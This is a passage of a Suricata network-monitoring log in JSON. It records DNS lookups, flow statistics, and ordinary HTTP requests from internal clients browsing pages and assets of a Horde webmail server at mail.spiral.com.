timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65531,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":46973,"memcap":0}}} 
{"timestamp":"2020-02-29T00:02:56.692897+0000","flow_id":1853994208105121,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37326,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58577,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:56.798619+0000","flow_id":1853994208105121,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37326,"proto":"UDP","dns":{"type":"answer","id":58577,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:56.798619+0000","flow_id":1853994208105121,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37326,"proto":"UDP","dns":{"type":"answer","id":58577,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:56.883709+0000","flow_id":946128316031874,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34714,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3289}} {"timestamp":"2020-02-29T00:03:01.884497+0000","flow_id":946128316031874,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34714,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3289},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":16438,"tx_id":0}} {"timestamp":"2020-02-29T00:03:02.000199+0000","event_type":"stats","stats":{"uptime":13834,"capture":{"kernel_packets":132778,"kernel_drops":0},"decoder":{"pkts":132791,"bytes":92097298,"invalid":180,"ipv4":131362,"ipv6":8,"ethernet":132791,"raw":0,"null":0,"sll":0,"tcp":126346,"udp":4822,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2679,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2695,"synack":2686,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1724,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2198,"failed_udp":107},"tx":{"http":4471,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2275}},"flow_mgr":{"closed_pruned":2652,"new_pruned":15,"est_pruned":2242,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21491,"memcap_state":0,"memcap_global":0},"http":{"
memuse":47053,"memcap":0}}} {"timestamp":"2020-02-29T00:03:02.001199+0000","flow_id":2014930921353933,"event_type":"flow","src_ip":"192.168.10.130","src_port":34692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":18,"bytes_toserver":2240,"bytes_toclient":17008,"start":"2020-02-29T00:01:20.225997+0000","end":"2020-02-29T00:02:01.561213+0000","age":41,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:02.101930+0000","flow_id":1908200990740010,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42172,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23108,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:02.213187+0000","flow_id":1908200990740010,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42172,"proto":"UDP","dns":{"type":"answer","id":23108,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:02.213187+0000","flow_id":1908200990740010,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42172,"proto":"UDP","dns":{"type":"answer","id":23108,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:02.356770+0000","flow_id":1392564397028430,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3659}} {"timestamp":"2020-02-29T00:03:03.000701+0000","flow_id":1508640163537177,"event_type":"flow","src_ip":"192.168.10.122","src_port":55863,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:58:02.368921+0000","end":"2020-02-28T23:58:02.481155+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:05.506519+0000","flow_id":1901152949615255,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59490,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19220,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:05.617809+0000","flow_id":1901152949615255,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59490,"proto":"UDP","dns":{"type":"answer","id":19220,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:05.617809+0000","flow_id":1901152949615255,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59490,"proto":"UDP","dns":{"type":"answer","id":19220,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:05.785158+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7618}} {"timestamp":"2020-02-29T00:03:07.231023+0000","flow_id":1392564397028430,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34716,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3659},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18958,"tx_id":0}} {"timestamp":"2020-02-29T00:03:07.238381+0000","flow_id":2064146958623533,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48633,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":686,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:07.343781+0000","flow_id":2064146958623533,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48633,"proto":"UDP","dns":{"type":"answer","id":686,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:07.343781+0000","flow_id":2064146958623533,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48633,"proto":"UDP","dns":{"type":"answer","id":686,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:03:07.485303+0000","flow_id":1392564397028430,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5173}} {"timestamp":"2020-02-29T00:03:08.000478+0000","flow_id":2113444573572588,"event_type":"flow","src_ip":"192.168.10.122","src_port":36684,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:58:07.290284+0000","end":"2020-02-28T23:58:07.401752+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:08.000652+0000","flow_id":1007666603637629,"event_type":"flow","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":23,"bytes_toserver":3083,"bytes_toclient":19825,"start":"2020-02-29T00:01:58.211837+0000","end":"2020-02-29T00:02:07.266149+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:03:08.000779+0000","flow_id":1732648478160707,"event_type":"flow","src_ip":"192.168.10.122","src_port":39450,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:58:07.505667+0000","end":"2020-02-28T23:58:07.617342+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:08.941077+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7618},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":39619,"tx_id":0}} {"timestamp":"2020-02-29T00:03:08.950105+0000","flow_id":2220655566946137,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49403,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":63050,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:03:09.000201+0000","event_type":"stats","stats":{"uptime":13841,"capture":{"kernel_packets":132831,"kernel_drops":0},"decoder":{"pkts":132841,"bytes":92119962,"invalid":180,"ipv4":131410,"ipv6":8,"ethernet":132841,"raw":0,"null":0,"sll":0,"tcp":126388,"udp":4828,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2681,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2697,"synack":2688,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1726,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2201,"failed_udp":107},"tx":{"http":4474,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2278}},"flow_mgr":{"closed_pruned":2653,"new_pruned":15,"est_pruned":2243,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21751,"memcap_state":0,"memcap_global":0},"http":{"memuse":168043,"memcap":0}}} 
{"timestamp":"2020-02-29T00:03:09.055838+0000","flow_id":2220655566946137,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49403,"proto":"UDP","dns":{"type":"answer","id":63050,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:09.055838+0000","flow_id":2220655566946137,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49403,"proto":"UDP","dns":{"type":"answer","id":63050,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:09.122920+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8171}} {"timestamp":"2020-02-29T00:03:09.151356+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8171},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":33109,"tx_id":1}} 
{"timestamp":"2020-02-29T00:03:09.190153+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":813}} {"timestamp":"2020-02-29T00:03:09.191876+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":813},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":2235,"tx_id":2}} {"timestamp":"2020-02-29T00:03:09.192187+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/quickfinder.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1159}} 
{"timestamp":"2020-02-29T00:03:09.205894+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/quickfinder.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1159},"app_proto":"http","fileinfo":{"filename":"\/js\/quickfinder.js","state":"CLOSED","stored":false,"size":3277,"tx_id":3}} {"timestamp":"2020-02-29T00:03:09.206216+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/tables.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2119}} {"timestamp":"2020-02-29T00:03:09.242286+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/tables.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2119},"app_proto":"http","fileinfo":{"filename":"\/js\/tables.js","state":"CLOSED","stored":false,"size":6954,"tx_id":4}} 
{"timestamp":"2020-02-29T00:03:09.247875+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108}} {"timestamp":"2020-02-29T00:03:09.249821+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tab.png","state":"CLOSED","stored":false,"size":108,"tx_id":5}} {"timestamp":"2020-02-29T00:03:09.250673+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/add.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":512}} 
{"timestamp":"2020-02-29T00:03:09.250924+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:03:09.252524+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52670,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-split.png","state":"CLOSED","stored":false,"size":87,"tx_id":0}} {"timestamp":"2020-02-29T00:03:09.252937+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/add.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":512},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/add.png","state":"CLOSED","stored":false,"size":512,"tx_id":6}} {"timestamp":"2020-02-29T00:03:09.253102+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460}} {"timestamp":"2020-02-29T00:03:09.253546+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52670,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/search.png","state":"CLOSED","stored":false,"size":460,"tx_id":1}} {"timestamp":"2020-02-29T00:03:09.254808+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/nag.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; 
Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":465}} {"timestamp":"2020-02-29T00:03:09.256273+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/nag.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":465},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/nag.png","state":"CLOSED","stored":false,"size":465,"tx_id":7}} {"timestamp":"2020-02-29T00:03:09.257064+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515}} {"timestamp":"2020-02-29T00:03:09.258222+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
